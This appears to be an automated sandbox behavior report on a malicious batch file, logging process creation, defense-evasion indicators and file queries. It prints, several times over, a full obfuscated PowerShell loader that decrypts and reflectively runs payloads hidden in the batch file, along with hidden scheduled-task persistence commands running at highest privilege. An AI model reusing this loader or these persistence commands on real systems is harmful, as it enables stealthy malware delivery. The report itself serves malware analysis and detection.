        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess token adjusted: Debug
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeMemory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: Yara matchFile source: amsi64_7900.amsi.csv, type: OTHER
        Source: Yara matchFile source: amsi64_5264.amsi.csv, type: OTHER
        Source: 5.2.powershell.exe.263b4b2c370.10.raw.unpack, sjQgeJFGkOfBsyocSykt.csReference to suspicious API methods: LoadLibrary("ntdll.dll")
        Source: 5.2.powershell.exe.263b4b2c370.10.raw.unpack, sjQgeJFGkOfBsyocSykt.csReference to suspicious API methods: GetProcAddress(hModule, "EtwEventWrite")
        Source: 5.2.powershell.exe.263b4b2c370.10.raw.unpack, sjQgeJFGkOfBsyocSykt.csReference to suspicious API methods: VirtualProtect(procAddress, (UIntPtr)(ulong)array.Length, PAGE_EXECUTE_READWRITE, out var lpflOldProtect)
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1IDZ0tblUPImy6+cAa/0r4ufKoB0X6q7gAxomXAbqns='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ojV8xek5mRtM5RXRDDIF7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xCPmk=New-Object System.IO.MemoryStream(,$param_var); $wkaLh=New-Object System.IO.MemoryStream; $VHSAV=New-Object System.IO.Compression.GZipStream($xCPmk, [IO.Compression.CompressionMode]::Decompress); $VHSAV.CopyTo($wkaLh); $VHSAV.Dispose(); $xCPmk.Dispose(); $wkaLh.Dispose(); $wkaLh.ToArray();}function execute_function($param_var,$param2_var){ $cDSQK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xoAaG=$cDSQK.EntryPoint; $xoAaG.Invoke($null, $param2_var);}$ASmjg = 'C:\Users\user\Desktop\Pollosappnuevo.bat';$host.UI.RawUI.WindowTitle = $ASmjg;$eFpSQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ASmjg).Split([Environment]::NewLine);foreach ($lDEYJ in $eFpSQ) { if ($lDEYJ.StartsWith(':: ')) { $dXBjK=$lDEYJ.Substring(3); break; }}$payloads_var=[string[]]$dXBjK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net fileJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1IDZ0tblUPImy6+cAa/0r4ufKoB0X6q7gAxomXAbqns='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ojV8xek5mRtM5RXRDDIF7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xCPmk=New-Object System.IO.MemoryStream(,$param_var); $wkaLh=New-Object System.IO.MemoryStream; $VHSAV=New-Object System.IO.Compression.GZipStream($xCPmk, [IO.Compression.CompressionMode]::Decompress); $VHSAV.CopyTo($wkaLh); $VHSAV.Dispose(); $xCPmk.Dispose(); $wkaLh.Dispose(); $wkaLh.ToArray();}function execute_function($param_var,$param2_var){ $cDSQK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xoAaG=$cDSQK.EntryPoint; $xoAaG.Invoke($null, $param2_var);}$ASmjg = 'C:\Users\user\Desktop\Pollosappnuevo.bat';$host.UI.RawUI.WindowTitle = $ASmjg;$eFpSQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ASmjg).Split([Environment]::NewLine);foreach ($lDEYJ in $eFpSQ) { if ($lDEYJ.StartsWith(':: ')) { $dXBjK=$lDEYJ.Substring(3); break; }}$payloads_var=[string[]]$dXBjK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));Jump to behavior
        Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 fileJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_616_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\startup_str_616.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -ForceJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\startup_str_616.vbs" Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_616.bat" "Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net fileJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1IDZ0tblUPImy6+cAa/0r4ufKoB0X6q7gAxomXAbqns='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ojV8xek5mRtM5RXRDDIF7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xCPmk=New-Object System.IO.MemoryStream(,$param_var); $wkaLh=New-Object System.IO.MemoryStream; $VHSAV=New-Object System.IO.Compression.GZipStream($xCPmk, [IO.Compression.CompressionMode]::Decompress); $VHSAV.CopyTo($wkaLh); $VHSAV.Dispose(); $xCPmk.Dispose(); $wkaLh.Dispose(); $wkaLh.ToArray();}function execute_function($param_var,$param2_var){ $cDSQK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xoAaG=$cDSQK.EntryPoint; $xoAaG.Invoke($null, $param2_var);}$ASmjg = 'C:\Users\user\AppData\Roaming\startup_str_616.bat';$host.UI.RawUI.WindowTitle = $ASmjg;$eFpSQ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($ASmjg).Split([Environment]::NewLine);foreach ($lDEYJ in $eFpSQ) { if ($lDEYJ.StartsWith(':: ')) { $dXBjK=$lDEYJ.Substring(3); break; }}$payloads_var=[string[]]$dXBjK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));Jump to behavior
        Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 fileJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "e45iasd" /tr "C:\Users\user\AppData\Local\Temp\e45iasd.exe"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[system.security.cryptography.aes]::create(); $aes_var.mode=[system.security.cryptography.ciphermode]::cbc; $aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7; $aes_var.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('1idz0tblupimy6+caa/0r4ufkob0x6q7gaxomxabqns='); $aes_var.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('ojv8xek5mrtm5rxrddif7w=='); $decryptor_var=$aes_var.createdecryptor(); $return_var=$decryptor_var.transformfinalblock($param_var, 0, $param_var.length); $decryptor_var.dispose(); $aes_var.dispose(); $return_var;}function decompress_function($param_var){ $xcpmk=new-object system.io.memorystream(,$param_var); $wkalh=new-object system.io.memorystream; $vhsav=new-object system.io.compression.gzipstream($xcpmk, [io.compression.compressionmode]::decompress); $vhsav.copyto($wkalh); $vhsav.dispose(); $xcpmk.dispose(); $wkalh.dispose(); $wkalh.toarray();}function execute_function($param_var,$param2_var){ $cdsqk=[system.reflection.assembly]::('daol'[-1..-4] -join '')([byte[]]$param_var); $xoaag=$cdsqk.entrypoint; $xoaag.invoke($null, $param2_var);}$asmjg = 'c:\users\user\desktop\pollosappnuevo.bat';$host.ui.rawui.windowtitle = $asmjg;$efpsq=[system.io.file]::('txetlladaer'[-1..-11] -join '')($asmjg).split([environment]::newline);foreach ($ldeyj in $efpsq) { if ($ldeyj.startswith(':: ')) { $dxbjk=$ldeyj.substring(3); break; }}$payloads_var=[string[]]$dxbjk.split('\');$payload1_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" register-scheduledtask -taskname 'runtimebroker_startup_616_str' -trigger (new-scheduledtasktrigger -atlogon) -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\startup_str_616.vbs') -settings (new-scheduledtasksettingsset -allowstartifonbatteries -hidden -executiontimelimit 0) -runlevel highest -force
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[system.security.cryptography.aes]::create(); $aes_var.mode=[system.security.cryptography.ciphermode]::cbc; $aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7; $aes_var.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('1idz0tblupimy6+caa/0r4ufkob0x6q7gaxomxabqns='); $aes_var.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('ojv8xek5mrtm5rxrddif7w=='); $decryptor_var=$aes_var.createdecryptor(); $return_var=$decryptor_var.transformfinalblock($param_var, 0, $param_var.length); $decryptor_var.dispose(); $aes_var.dispose(); $return_var;}function decompress_function($param_var){ $xcpmk=new-object system.io.memorystream(,$param_var); $wkalh=new-object system.io.memorystream; $vhsav=new-object system.io.compression.gzipstream($xcpmk, [io.compression.compressionmode]::decompress); $vhsav.copyto($wkalh); $vhsav.dispose(); $xcpmk.dispose(); $wkalh.dispose(); $wkalh.toarray();}function execute_function($param_var,$param2_var){ $cdsqk=[system.reflection.assembly]::('daol'[-1..-4] -join '')([byte[]]$param_var); $xoaag=$cdsqk.entrypoint; $xoaag.invoke($null, $param2_var);}$asmjg = 'c:\users\user\appdata\roaming\startup_str_616.bat';$host.ui.rawui.windowtitle = $asmjg;$efpsq=[system.io.file]::('txetlladaer'[-1..-11] -join '')($asmjg).split([environment]::newline);foreach ($ldeyj in $efpsq) { if ($ldeyj.startswith(':: ')) { $dxbjk=$ldeyj.substring(3); break; }}$payloads_var=[string[]]$dxbjk.split('\');$payload1_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[system.security.cryptography.aes]::create(); $aes_var.mode=[system.security.cryptography.ciphermode]::cbc; $aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7; $aes_var.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('1idz0tblupimy6+caa/0r4ufkob0x6q7gaxomxabqns='); $aes_var.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('ojv8xek5mrtm5rxrddif7w=='); $decryptor_var=$aes_var.createdecryptor(); $return_var=$decryptor_var.transformfinalblock($param_var, 0, $param_var.length); $decryptor_var.dispose(); $aes_var.dispose(); $return_var;}function decompress_function($param_var){ $xcpmk=new-object system.io.memorystream(,$param_var); $wkalh=new-object system.io.memorystream; $vhsav=new-object system.io.compression.gzipstream($xcpmk, [io.compression.compressionmode]::decompress); $vhsav.copyto($wkalh); $vhsav.dispose(); $xcpmk.dispose(); $wkalh.dispose(); $wkalh.toarray();}function execute_function($param_var,$param2_var){ $cdsqk=[system.reflection.assembly]::('daol'[-1..-4] -join '')([byte[]]$param_var); $xoaag=$cdsqk.entrypoint; $xoaag.invoke($null, $param2_var);}$asmjg = 'c:\users\user\desktop\pollosappnuevo.bat';$host.ui.rawui.windowtitle = $asmjg;$efpsq=[system.io.file]::('txetlladaer'[-1..-11] -join '')($asmjg).split([environment]::newline);foreach ($ldeyj in $efpsq) { if ($ldeyj.startswith(':: ')) { $dxbjk=$ldeyj.substring(3); break; }}$payloads_var=[string[]]$dxbjk.split('\');$payload1_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" register-scheduledtask -taskname 'runtimebroker_startup_616_str' -trigger (new-scheduledtasktrigger -atlogon) -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\startup_str_616.vbs') -settings (new-scheduledtasksettingsset -allowstartifonbatteries -hidden -executiontimelimit 0) -runlevel highest -forceJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[system.security.cryptography.aes]::create(); $aes_var.mode=[system.security.cryptography.ciphermode]::cbc; $aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7; $aes_var.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('1idz0tblupimy6+caa/0r4ufkob0x6q7gaxomxabqns='); $aes_var.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('ojv8xek5mrtm5rxrddif7w=='); $decryptor_var=$aes_var.createdecryptor(); $return_var=$decryptor_var.transformfinalblock($param_var, 0, $param_var.length); $decryptor_var.dispose(); $aes_var.dispose(); $return_var;}function decompress_function($param_var){ $xcpmk=new-object system.io.memorystream(,$param_var); $wkalh=new-object system.io.memorystream; $vhsav=new-object system.io.compression.gzipstream($xcpmk, [io.compression.compressionmode]::decompress); $vhsav.copyto($wkalh); $vhsav.dispose(); $xcpmk.dispose(); $wkalh.dispose(); $wkalh.toarray();}function execute_function($param_var,$param2_var){ $cdsqk=[system.reflection.assembly]::('daol'[-1..-4] -join '')([byte[]]$param_var); $xoaag=$cdsqk.entrypoint; $xoaag.invoke($null, $param2_var);}$asmjg = 'c:\users\user\appdata\roaming\startup_str_616.bat';$host.ui.rawui.windowtitle = $asmjg;$efpsq=[system.io.file]::('txetlladaer'[-1..-11] -join '')($asmjg).split([environment]::newline);foreach ($ldeyj in $efpsq) { if ($ldeyj.startswith(':: ')) { $dxbjk=$ldeyj.substring(3); break; }}$payloads_var=[string[]]$dxbjk.split('\');$payload1_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
